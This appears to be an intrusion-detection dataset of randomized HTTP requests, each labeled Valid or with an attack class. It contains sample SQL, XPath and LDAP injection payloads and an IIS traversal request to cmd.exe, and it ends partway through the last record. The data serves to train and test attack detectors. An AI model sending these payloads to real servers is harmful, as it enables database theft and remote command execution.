GET /dhV3goetohFriaR/wi/rxQiUnGPt/xodtCEl/0ktIess/0WjCWW/jceie/hr.pl?i2qdwxlocation8=raatza&es=679745619&ktoesayhb=nhtpassSeht%29vfdi%7E8W&aaS=k%24nNsoe4&cmyn1zdem=nh0&hedder8n2ajo=rpoao&3q2emsoAaugt=lHxZ&oomed11=is&oudt0sctkt=Iepbc2eiehgulsw&bcpheggtoI=naW5&YuMYO.a8w7i=284691&ZeperC=i&lDS0sgl7Mya2r=eln&pnal3ianri5w=%25r1%3Cnulllhd+ksilmTcreplace9+&nevtm6qfaa=s9hswfhy0 HTTP/1.0
Host: www.nu0H.cz
Connection: d5s9eeea
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: gzip, deflate, compress;q=0.9, deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 10.19.142.215
Cookie: bmVdeleten=4teo|;VMbaRpGEa@Yo=5;iyrunat=4tmpima
Cookie2: $Version="3"
Date: Mon, 05 Dec 05 03:08:25 CET
ETag: W/"CQt5GewDPb5sPFSX6ofB"
Expect: itas6ore=onoSer5;nndt2=mnVjam
From: hyusCat@gshWelhtl.uk
If-Modified-Since: Sun, 26 Jun 05 24:10:04 GMT
If-Unmodified-Since: Sun, 04 Mar 07 04:14:30 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Jun 06 22:57:28 UTC
Max-Forwards: 53
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic cmV0czpzZG51ZXRs
Authorization: Basic YTRobGV1Yjk6bjl4dE5lYQ==
Range: 06-233058
Referer: /meetee/4tifc.tiff
TE: trailers,gzip;q=0.1,gzip;q=0.6
Trailer: Cache-Control
User-Agent: t9kJinEns
UA-CPU: PowerPC
UA-Disp: 2597,7674,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8266x800
Via: 2.6 28.99.38.171
Transfer-Encoding: identity
Upgrade: 6rnez3/1.7, ane/0.4, ioia/7.2, nnR/1.8, 7mdu/9.8
Warning: 436 73.117.227.57:6 "thodictf5aXh1rett" "Sun, 19 Apr 09 22:34:03 UTC"
X-Forwarded-For: 120.240.133.60
X-Serial-Number: 51313390873628125654
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14952
Start - Id: 42798
class: SqlInjection
PUT /qkDQvarL89Dashutdown./2S/ar@WEF/rwlibsgQtz4U/cIW1yQwD5q0N/8H13YaBS._MSF/r6Wd1OiPci0P.htm? HTTP/1.1
Content-Length: 181
Content-Language: tahhw,tatmngtb,zd
Content-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Host: 63.214.83.103
Connection: keep-alive
Accept: application/*, video/quicktime;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: identity;q=0.2
Cookie: oscn9='  )  UNION     ALL  SELECT     'rtetSERsoo',7,174,'Hare9n',5   FROM     0hx8itesnc    WHERE  ('' = '
Cookie2: $Version="8"
Date: Sat, 30 Jun 07 07:49:56 GMT
If-Modified-Since: Mon, 05 Jul 04 14:36:51 CET
Max-Forwards: 7922
Referer: /sl4drs8p.zip
User-Agent: Mozilla/3.9 (compatible; MSIE 9.4; Open BSD i586; Btop; pgdtr; sohn35lnae)
Via: 5.6 www.aeAs.tiff, oubstj/7.7 3.162.246.97

nmnea2hu7=Dlt+4ew4fe&4Iselect4B=9880&wcui9yq=ttldocument4usrcdr9Nkf&lhmeewtoflUs=tzrU&L@ME=fee1k3aahypRkw&lertwtjSnlE=eneoIstdin&neeneloxseol= s46r@autoexecN7hsrEatt&pyO2I9O=uue

End - Id: 42798
Start - Id: 35688
class: XPathInjection
GET /tE64T3v_/rdsuiwdttnytNaXlmpz.jsp?cneebm=6512&9shutdown%upaW6NFP=owJ2Ad89N&7bE=%28i++%3C++count%28mn%2Fchild%3A%3Atext%28%29%29++and+++++j+%3C+count%28iaO%2Fchild%3A%3Acomment%28%29%29++++and+++++k++%3C++++count%28eeu%2Fchild%3A%3A*%29++%29&dX4thameafa7wmr=478&isasff=0dbs&h0anhof2ede=9 HTTP/1.0
Host: www.iamdTgdat.de
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-chinesesimp;q=0.9, x-mac-cyrillic;q=0.0, x-mac-turkish, windows-1253
Accept-Encoding: identity, deflate;q=0.5, gzip, gzip;q=0.0
Accept-Language: eoe-ptaI;q=0.2, t-tord;q=0.6, ehdgio-oo9g;q=0.8, ee-tqtrreS, hatb-xeu
Cache-Control: no-cache
Client-ip: 50.131.48.51
Cookie: zjh=140705
Cookie2: $Version="3"
Date: Mon, 05 Sep 05 20:47:26 UTC
ETag: W/"nj-8LRGhI.3jkOBrNm"
Expect: dOaiscoo
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Sun, 17 Aug 08 24:21:45 CET
If-Unmodified-Since: Fri, 24 Oct 08 15:34:45 CET
If-Match: "g0sCcnngA3IsBVjeYRN"
If-None-Match: *
If-Range: *
Max-Forwards: 70
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM Nm9LZW05b2hud3NldTBzbWxlbnplYWVidEYyZGVXQWRkbmlsb1Vua2xuMHNybnRl
Authorization: onlo kocbiisi=iNbo9ksy
Range: -82,-22
Referer: /i38ahcer/6nnsle/xucoti5t/ebaiYg/etthy.mspx
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/1.0 (compatible; MSIE 3.0; Unix; hsEweter)
UA-CPU: PowerPC
UA-Disp: 165,7015,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 656x763
Via: HTTP/7.1 140.253.252.223
Transfer-Encoding: albn; mniyi=enrne
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 727389738621693748
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35688
Start - Id: 30871
class: Valid
GET /-fromy5hD_LYI/nh9SY9WK/r71u3tate5titedtTai7/kttn/rlrud0.cfm?irbsifjiaauoAri=libBstylecmde6a%5C%5D%24t HTTP/1.1
Host: 67.70.145.120
Connection: ncnen
Accept: application/*, video/mpeg;q=0.5, application/postscript
Accept-Charset: windows-1258;q=0.9, iso-8859-5;q=0.5, windows-874, x-mac-roman;q=0.9
Accept-Encoding: deflate;q=0.1, identity;q=0.0
Accept-Language: uI0m0o-rT;q=0.1, swpy3t-egia, rpaa6-oe;q=0.6, e-bv, EbeiE-aye0het
Cache-Control: no-store
Client-ip: 118.189.73.198
Cookie: wj=uofaa;eT96eahEdci=8;3hoVdnI=d3SI;mNI1ue=iAeisi
Cookie2: $Version="3"
Date: Mon, 16 May 05 09:50:54 GMT
ETag: W/"nOlxiGKqaqUwxGHvf"
Expect: 100-continue
From: eAanci@utss.com
If-Modified-Since: Fri, 16 May 08 20:26:20 CET
If-Unmodified-Since: Tue, 16 Aug 05 12:50:27 CET
If-Match: "FPUIdmtB39NPjKV"
If-None-Match: "uXjmFyh7LLBRX1Md"
If-Range: "nNnDIBaKhCUfE2IusWO5"
Max-Forwards: 489
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: NTLM dHhucnJzeWE2ek9yczFybmlycm9hZWVlb2E4YjI5T3FjdXZNbjByYWU=
Authorization: Basic ZWFkM2RoOmdlZWw0d2xy
Range: -4563
Referer: http://csmall.org/3retadB/en0ohh.htm
TE: trailers,trailers,trailers
Trailer: Expect
User-Agent: 5rsi43nmon
UA-CPU: Sparc
UA-Disp: 072,6639,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 562x7835
Via: eomfLn/1.1 68.75.251.237, 4.0 www.ztw9imec.css, HTTP/1.6 www.iCtstnue.shtml
Transfer-Encoding: compress
Upgrade: qhwab/2.3, lTob/9.5, heg/1.2, Axen/2.5
Warning: 189 www.mlol.css "aohnMtaeseT4szte" 
X-Forwarded-For: 37.25.72.3
X-Serial-Number: 5586644742
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30871
Start - Id: 13773
class: Valid
GET /rHqcMgrZcKZ_5.1VB6/t9MccTFUG6W/vmFdnN/hGGdE/pT/hn0a/rsi/aso/l4A/XoTMjautoexecc/dxK1etcRB.jpeg?6r8ap14sanow=05511652&5izuWSda=coexecIeti&le=9942196748&F4L@dqT3selectz4=e%40nM&RhtpassVnetcatL1=9740&si4aotmzq32esst=4209&eeEnmoet=to2i&a6tn=58978&4nDWI=fwd&ettnizErlu=oI%40H&leH=50113&srutst=copyo%3AtghsSec HTTP/1.0
Host: www.rat1cpup.net
Connection: close
Accept: audio/basic, application/zip
Accept-Charset: windows-1258;q=0.3, windows-1252, koi8
Accept-Encoding: deflate, identity
Accept-Language: UoYespru-7tt, su4eeed-rhetn;q=0.4, nxiesWfh-rloiosut;q=0.7
Cache-Control: no-transform
Client-ip: 133.173.34.181
Cookie: NueoOgt4yRee=1286010108;Isuowc=127063;ns3Oth=t-zxter3a;catYgCMQPGu6=f5z5Kn;eetsaPvd=@e
Cookie2: $Version="2"
Date: Sat, 25 Apr 09 20:05:09 CET
ETag: "0UqNPLqi-mZTG-Z3x"
Expect: Iarrwr=xhnQaptl;slhU=88n7sn
From: kaat@losa.de
If-Modified-Since: Fri, 19 Dec 08 19:04:47 UTC
If-Unmodified-Since: Wed, 05 May 04 02:49:45 UTC
If-Match: "LWAmsZJG9Sf1UkJqp8N"
If-None-Match: "ZvZVLFIZdMjcl0dz"
If-Range: Tue, 31 Oct 06 10:38:02 CET
Max-Forwards: 7
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic ZWk2NWE0YTpzdG9tZTJodA==
Authorization: Basic b0hvaEd3bmQ6RXRtaGxpZQ==
Range: -81240,-211
Referer: /txp4s.js
TE: deflate;q=0.0,trailers
Trailer: Cache-Control
User-Agent: Mozilla/7.5 (Machintosh; U; Mac OS X 4.9; eb-mu; rv:1.0.7) Gecko/95015699
UA-CPU: x86
UA-Disp: 722,0517,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 609x411
Via: 2.7 62.128.70.191, FTP/9.8 www.nwaS.tiff
Transfer-Encoding: deflate
Upgrade: Oiesa/5.8, 9pi/5.8
Warning: 937 31.191.36.176 "hsE3hbigjqoebo7" 
X-Forwarded-For: 235.235.43.82
X-Serial-Number: 26172268
----: ------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 13773
Start - Id: 14385
class: Valid
GET /8lvD-V-nusr/2Lnt3/ewR0PI8Wn/38umcis8EtaAzInee/Vmoeeirtrbevcaitt34.php3?5sepr5bThol9s6H=oaetrdorxxeia&tszens=symeoeiios3as7e&unRgce0ezaRolp9=eIlot3temanXikhs&hpnsSettCGepnl=etqco&yxrSXXClocationcCo=7364013466&iEd9obaiwteo1lo=u+aa3duaehoei6e&N9o6nh0umTkae=tasaU6&h4oGr=77370969&Uy64I66=6U%40n5io&oItusm=tXFq&sol3nedhatay=7282&eeffa7ieidesle=5031&QyYGZv=da%2BstOe+amezs%5DtbetweenLd&tepartris=snf3wdocumentfsevald6boot.inini HTTP/1.1
Host: 125.62.181.97:711
Connection: close
Accept: */*
Accept-Charset: cp-936;q=0.8, x-mac-roman;q=0.9, x-mac-chinesesimp;q=0.4
Accept-Encoding: 
Accept-Language: ynoq-eea, rhbir-levEi, v-gatrhapi;q=0.4, osU-ote29g, rzu-Emd9tm7
Cache-Control: no-store
Client-ip: 166.239.11.152
Cookie: nh8srgeNsan=049000;ieruEaOhxdhqzuc=o9eewtw0oT;wgetkcDFQ7y=Clhh;didmEode1jsst=t$ro9lmailF&cwT?ddn;mBoSeEe2ssr=eaTaolOTasnns
Cookie2: $Version="604"
Date: Fri, 23 Jul 04 13:19:44 CET
ETag: W/"Pq5veo@Ahq@YSkF4K"
Expect: 100-continue
From: Rt7eei@haruek9a0.st
If-Modified-Since: Wed, 19 Aug 09 19:05:33 CET
If-Unmodified-Since: Thu, 25 Mar 10 16:55:14 CET
If-Match: "OafY4_uTabfa1UL9q."
If-None-Match: "@_VS8hO9C@gH1_CJ."
If-Range: Mon, 19 Oct 09 23:17:25 UTC
Max-Forwards: 076
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: n5ehm8 lhbo=Xlxnp
Authorization: Basic b2dvb246cDhzZHgyamU=
Range: -71089,-74863
Referer: http://www.siii.be/ovicx.sh
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/6.1 (Windows; U; WinNT 7.5; cr-eu; rv:3.9.5) Gecko/70356339
UA-CPU: StrongARM
UA-Disp: 437,7819,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0063x9753
Via: 8de/3.1 www.tsimds.gif:5383, FTP/4.3 www.yttbD.shtml, 3.2 www.mIbs.htm
Transfer-Encoding: gzip
Upgrade: cnx/0.5, so5B/5.3, iap/9.1
Warning: 501 www.l2thOa1r.shtml "eZnhnt2beuvl" "Wed, 28 Apr 10 20:34:29 CET"
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 2617540720922658779
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 14385
Start - Id: 39104
class: LdapInjection
PUT /fH7cioas3v/mUlybknBX05ZSOTTDN/home77-.mq26havingoThttpP./bh5nc1U3/0thnsOioVR9rriFrfd/pfulRw3l1b.QTwF/wldoyedseioi/rC/5dMQ02./rxSWFHTbtclX3n/Rh.jpeg? HTTP/1.1
Content-Length: 79
Content-Language: h2ru,ytf9gehT
Content-Encoding: gzip
Content-Location: /seaSio/L9teai/75fi.mdb
Content-MD5: aWNsNzNmTW5lY3ROb0hvcw==
Content-Type: application/x-www-form-urlencoded
Host: 177.226.181.136
Connection: close
Accept: */*;q=0.0
Accept-Charset: windows-1254, cp-936, x-mac-chinesesimp, hz-gb-2312, iso-8859-6;q=0.2
Accept-Encoding: 
Accept-Language: 2iteshaf-o8t379;q=0.2, t-w, d5nyhn-relrn;q=0.4
Cache-Control: only-if-cached
Cookie: keeoshgd4tszho=) (|   (neee=s4aa*);6wa=ohoifweirophnsa;oIe=dxs-qCDoOwO;sEronatf=o+stylels3oeAH/ehwdr~lLautoexec
Date: Thu, 24 Jul 08 15:07:37 GMT
ETag: W/"T5j9hwxjuSBfgxb5d1U"
Expect: 100-continue
If-Modified-Since: Fri, 11 Dec 09 03:54:19 UTC
If-Match: "KEfFSfUE82DIevnrVp"
If-None-Match: *
If-Range: "voBR6RpYGNbq1Z9R"
Max-Forwards: 5
MIME-Version: 4.0
Pragma: no-cache
Authorization: Digest realm
Referer: http://www.ponrr11.org/hhreyne/1ft8cnna/ociqalnn/tstiewN.tar
Trailer: Pragma
User-Agent: iria1tli (9t3VWRaa)
UA-CPU: StrongARM
UA-Disp: 560,8343,16
UA-Pixels: 0653x3308
Via: FTP/9.9 123.67.26.235
Transfer-Encoding: identity
Warning: 202 www.o0nEdl.jpg "oenorbl0" 

dseckaottaeiSei=\d9=t&aeQni=nsaSoscriptXntold&woqwntdcNrfczen=7817&mithen=4

End - Id: 39104
Start - Id: 8698
class: Valid
GET /n3wXulN2FaDKF/tnE4aco01siidauEme/3T5kUv_M/JreplaceyyT/eB4MokE30UlU_apc/iq/hedw/pc6dA0G.asmx?htbe9h=documentexec+&utartlpof=7108&ueekepshae=3&73IhtaccesK=255&5wejinhoiba=0462460&tqait1rMoej=openneonOusr%28&oslael=4fo6&ddEuh5m=+oOr&delete7access_log_LSQd5location9=o+nnrntmpaaat%293lwnn&wdZ4ewindow.openQ5Q.=e+etcB%3Cipasswd&ca8rnaiatuh=it&ie7osynSapaeR=snBpttn&aosPEdlobam=e0eeeob8uovkpd5&LoTqlme0im=nTl.h&iaesscTtn=nrai4dEItotqs HTTP/1.1
Host: www.MearSTot.cz
Connection: keep-alive
Accept: application/*, application/*;q=0.4, video/quicktime
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: eUxsm-hbi;q=0.5, fyaSt-2p0dc4ei;q=0.4, qica9Kmr-n, tuir-honiHw;q=0.3
Cache-Control: max-age=7484
Client-ip: 173.156.22.51
Cookie: bEuKBC=eeelmyeaRh1eethn
Cookie2: $Version="1"
Date: Sun, 28 Nov 04 18:46:48 UTC
ETag: W/"iEY.oi6B6Dsil3ru0"
Expect: qeTnd=n6lm
From: Mtotwsm@b5hmUaSS.ch
If-Modified-Since: Sat, 21 Oct 06 01:30:03 CET
If-Unmodified-Since: Thu, 18 May 06 19:09:21 UTC
If-Match: *
If-None-Match: "@K4TF_ksW5R_QilFGb"
If-Range: *
Max-Forwards: 612
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: iaays9 2e7s=dduas8it
Authorization: Basic YWdSc0UxOnR0aWZh
Range: -1251,-8,78356-
Referer: /traifti/oohphRd/rootIanc.cfm
TE: trailers
Trailer: Accept-Language
User-Agent: osl22a
UA-CPU: PowerPC
UA-Disp: 8125,063,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 286x293
Via: 2.8 www.leiinlr.tiff
Transfer-Encoding: identity
Upgrade: t6hhg/7.3, iEEkud/1.6
Warning: 642 www.n84b.htm "lyajg" "Mon, 15 Jan 07 21:15:54 UTC"
X-Forwarded-For: 142.15.151.110
X-Serial-Number: 396730650206
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8698
Start - Id: 1868
class: Valid
GET /zscripte/Zhn/newm/aR@-c/Rwg4LLF/ge5yQlIL.php4?ex3Ese4=o&r1=c+ilMlwhIte%28ohAocopy1g&esqt=n3hJ3GYNo&erheT=eoaRetrpjsros0&eCl=te&tQacasaLn5b6=99150644&mQk1822SUbgsoundowinnt=8itt&9se=pGZ6OmoDl&aec3=5775163&NSogadeaw5acst=bodyiyminsert+ti+%2BsF5&stojknoasds=5220 HTTP/1.1
Host: www.5njFkeaspE.biz
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: windows-1258;q=0.2, x-mac-chinesesimp, cp-950;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 188.102.222.214
Cookie: 2hHeiNzey6nttGr=ao0vAft:sz4gwheref;g3Ro=2anvi;0eOi=aieasm;dnehseeiesl=2005;rui3le=aVMFV07aU;e5Tabis=030
Cookie2: $Version="372"
Date: Sat, 21 Jun 08 22:48:01 GMT
ETag: W/"3C2rID-teD7-_L1s"
Expect: 100-continue
From: eopieirR@te3gi1emy.be
If-Modified-Since: Sat, 17 Apr 10 12:46:57 UTC
If-Unmodified-Since: Sun, 05 Mar 06 16:58:23 UTC
If-Match: *
If-None-Match: *
If-Range: "v4@CFehNa4p.zhYVPDtD"
Max-Forwards: 232
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: dot0w shDsc1da=rfcu0
Authorization: Digest response="7B9E4bDa2E62CAc03edF306a53A59e21"
Range: -4,19022-,558645-4370
Referer: /e1nidei/oCnni/hdaa.wav
TE: trailers
Trailer: Range
User-Agent: Mozilla/9.6 (compatible; uoseee5t; Open BSD i386; sreuthAziE)
UA-CPU: PowerPC
UA-Disp: 171,774,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 899x371
Via: 3.6 www.odtbs.js, HTTP/6.7 www.IEedgh.gif
Transfer-Encoding: lnyalf; seLla94n=gavig
Upgrade: ue0/2.4, itqt5/5.4, 6Erms/1.3
Warning: 710 www.63f6T2cn.css "SbabsU" "Tue, 01 Aug 06 20:42:57 GMT"
X-Forwarded-For: 120.197.169.25
X-Serial-Number: 0502244013679080099
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1868
Start - Id: 23596
class: Valid
GET /o7CYgzecwqgAdx9d0A.gif?YsnwFCsystemr=e1nmto&Dh.v@gpassthru_YOq=45480977&54bdaccepts=gWea&r59E=7890558&wHvEnw5b=1433&dcni=ies&SehioIi=9723188&window.openbi2=ez7itrormo&DhDzH1vA=Syeuoir%7EsH&rnv=ndoe&4eanousndebNnb=pydpnr2rakpqjq3dm HTTP/1.0
Host: 204.106.213.175:80
Connection: close
Accept: text/xml, application/*;q=0.6, image/png;q=0.5
Accept-Charset: iso-8859-15;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 20.216.49.55
Cookie: e4r4eetntanr=3isoauc36l
Cookie2: $Version="509"
Date: Tue, 29 Aug 06 14:28:15 CET
ETag: "deTB1BesKehTVhheWwR"
Expect: iwaiceg=ceaye8n
From: neipirz@lT1pt.cz
If-Modified-Since: Mon, 10 Dec 07 14:33:30 CET
If-Unmodified-Since: Sat, 12 Jun 04 22:07:32 UTC
If-Match: ".7tg8N.a4bNlOKt0V"
If-None-Match: "g6gMXJVsz_SLszm"
If-Range: Sat, 22 Apr 06 14:34:36 UTC
Max-Forwards: 5554
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest nc=6741AB8B
Authorization: cztpt oeonpu=eqCtouEf
Range: 62145-4,-94,41-
Referer: /cblheA.htm
TE: gzip;q=0.1,trailers
Trailer: User-Agent
User-Agent: tQ.@4TqP7 http://www.seLisopt.fr
UA-CPU: PowerPC
UA-Disp: 990,4504,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 251x222
Via: FTP/6.7 61.234.110.186:402, 8.6 www.mJua.css, FTP/2.2 104.145.213.99
Transfer-Encoding: deflate
Upgrade: 0hrIfz/4.4, oepr/9.3
Warning: 942 www.stchto.jpg "wMlilUefo" "Sun, 18 Jun 06 16:19:46 UTC"
X-Forwarded-For: 161.208.121.203
X-Serial-Number: 266315250602737413
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23596
Start - Id: 24709
class: Valid
GET /euodor4Ifp8ytun9d1/adiaoha/Emradu1mir7/3X@uE96Hgut7V/QkSyxPE7MDu/rbalseeshisdmo/edwrstans7ie/ehs2boldaptwghoiE.gif? HTTP/1.1
Host: 231.166.249.193:7153
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-turkish, iso-8859-15, iso-2022-jp;q=0.3
Accept-Encoding: deflate;q=0.4, identity, compress, compress
Accept-Language: l5-nlhsnc5p, 7rfaAst-tmddbsu, l2m-cga, c3oPD-Hwqmmrm;q=0.3, asesye-incaiia;q=0.4
Cache-Control: no-transform
Client-ip: 246.244.195.20
Cookie: nbne6=rchhomeU;ecnPvu1rAmts=t&i;yv9llhgt3rteaib=t74FdDb;8oct=i7peOservicesA
Cookie2: $Version="257"
Date: Wed, 21 Jan 09 04:33:23 CET
ETag: W/"RhQK9iPTJL@dncaX8C"
Expect: 100-continue
From: erIrtmn@egw1d.net
If-Modified-Since: Mon, 08 Mar 10 03:42:08 UTC
If-Unmodified-Since: Thu, 06 Nov 08 08:48:33 GMT
If-Match: "Lv90q@RbxtG4MeZGMVr"
If-None-Match: "YczduekdRLoVBSKIY-Hz"
If-Range: "DS9h_iD1azjt3I0un"
Max-Forwards: 0975
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM YWJvdG5vbHJzdHNlbXJvZmlldTJkT2VnYWRSc1B5bzdlaWJodGNy
Authorization: NTLM d3JhcmVnclJYMXdjcmJhczNjcnFyZWx2aW53SHNzaGQ5ZXBtbDM=
Range: 3-
Referer: http://dam5pd.org/sgrpt4bR/tf5omPpe/gstpt.tiff
TE: trailers
Trailer: Date
User-Agent: Mozilla/3.3 (X11; U; SunOS sun4u 6.9; wc-ir; rv:7.4.6) Gecko/83308452
UA-CPU: PowerPC
UA-Disp: 9340,8339,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 291x803
Via: HTTP/7.6 www.lEil4.js:521, FTP/3.8 www.itWsgdt.html
Transfer-Encoding: 5ireM; wnhul=dwaiT0js
Upgrade: noohwb/5.0
Warning: 192 21.187.17.129:7 "hlntoFrmiWedrea" 
X-Forwarded-For: 127.43.236.207
X-Serial-Number: 7759023411175915
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24709
Start - Id: 38574
class: LdapInjection
GET /audnE/vDK0kj6NYuCl/2LsamrFTFf0/hzDI6OvqX41KdhZy./wxdJEe1X/C2irlgeotoslejYl/G-vD1Rs/85bA2eqSsH/ss.css?tHoqidQ=%29++++%28++%7C++++%28+++cn%3D*o+%27brien*%29%28mail+%3D*o+++%27brien*+++%29+&oSnLg6i=7858&1mIYooerhsqohn=islRtftdilsl6rwsh HTTP/1.1
Host: 114.56.50.140
Connection: keep-alive
Accept: application/x-tar;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.9
Cache-Control: vt=s3
Client-ip: 231.216.109.79
Cookie: otnsx=ee8el;39CpuL=ge  tst rsala
Cookie2: $Version="987"
Date: Mon, 03 Jan 05 21:55:09 CET
ETag: "qAxc.1akzYKJs3O8J1o0"
Expect: UpT3s
From: snaN@sfjo15.ch
If-Modified-Since: Sun, 19 Dec 04 10:41:41 UTC
If-Unmodified-Since: Wed, 02 Feb 05 23:38:43 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic YXRkdzJsSXI6ejJ0Zmlp
Authorization: te0cr rhsa=daNhaixq
Range: -5
Referer: /tabbnrf/snie52nC/odentr/llssthi.php
TE: trailers,deflate;q=0.5
Trailer: If-Range
User-Agent: pmop/7.7.8
UA-CPU: PowerPC
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 233x5921
Via: FTP/1.2 153.237.119.41
Transfer-Encoding: compress
Upgrade: ksu/7.2, ear/3.1
Warning: 149 www.memO4ih.js "gsEeeekriesa" "Mon, 30 Nov 09 07:31:03 GMT"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38574
Start - Id: 20959
class: Valid
GET /gnnmcAunxltac4onewg.jpg? HTTP/1.0
Host: 15.148.32.250
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1253;q=0.7, utf-7, iso-8859-3, windows-1254;q=0.9
Accept-Encoding: 
Accept-Language: l8ysi-azsvloe, wna-isTpitna;q=0.0, Czo-eCzIjh;q=0.6, r-bceo1a;q=0.7, rdmn-iida0t;q=0.3
Cache-Control: only-if-cached
Client-ip: 95.153.52.209
Cookie: ydrns2=t6Ah;otea=hRyqv;usTi4euxaEtYiq=~NinFO tink;hG=scripta;nde4osee=aua
Cookie2: $Version="85"
Date: Tue, 19 Jun 07 13:35:54 GMT
ETag: "hes6V5xyQxH53Ap"
Expect: 100-continue
From: stnsist@ee8nh.de
If-Modified-Since: Wed, 20 May 09 02:05:56 CET
If-Unmodified-Since: Mon, 15 Dec 08 14:53:49 UTC
If-Match: "iNW4_@jvS-RDf20e5_E"
If-None-Match: "zAizyX8Lxlyq8C9@g"
If-Range: Wed, 24 Mar 04 24:57:45 UTC
Max-Forwards: 67
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: NTLM Ym5pbE1FeWR0THJpZXNlaHp5bzNsc29Tb2F0c3BvaFRiRXVFcklh
Authorization: Basic clR5bDpjN2xOaHNtTA==
Range: 225798-,299422-
Referer: http://onmut.gov/3oee.html
TE: chunked;q=0.4,deflate;q=0.3
Trailer: Authorization
User-Agent: ihnud/1.4.4.3.2
UA-CPU: Sparc
UA-Disp: 3276,4561,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 212x4647
Via: 1.3 www.Bge0luS.html, ia4an/9.5 www.ngee9yn6.shtml
Transfer-Encoding: gzip
Upgrade: tknsdI/6.1, bao9sk/7.3, wfso/2.7, lrm/1.0
Warning: 818 39.101.24.238 "Ei4etc3nfbsi2nwj" 
X-Forwarded-For: 251.229.233.197
X-Serial-Number: 175416
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20959
Start - Id: 44281
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.8mawahd.cz
Connection: afniv
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: mutsqTy='nhe'
Client-ip: 192.246.21.91
Cookie: Za=bFBc9Tgi;OrmMPBIr-N0kY=3280702009;ta6gStOnp=zAvz;jRservicesRelUjn=83517;stoqeiahdrscu=lIA
Cookie2: $Version="4"
Date: Sat, 17 Jan 09 21:54:09 GMT
ETag: "lRY.im-Vf8FuriFi"
Expect: 100-continue
From: aEtkm@tNLeshe.uk
If-Modified-Since: Thu, 18 Nov 04 19:40:33 UTC
If-Unmodified-Since: Thu, 20 Dec 07 03:16:31 CET
If-Match: *
If-None-Match: *
If-Range: "-Rav@SdstaZnQvZ"
Max-Forwards: 3
MIME-Version: 6.9
Pragma: oercr=cko5
Proxy-Authorization: vahee otnsenso=4Odndyfc
Authorization: Basic N2lObmV0OmhhaXdOd2xp
Range: 639-682,28229-
Referer: /gR3s/6iidYsas.nsf
TE: chunked;q=0.8,trailers
Trailer: Via
User-Agent: HIeis9etnoHlwwRraMtx
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 902x0631
Via: rnul/6.4 www.leezneo.js
Transfer-Encoding: gzip
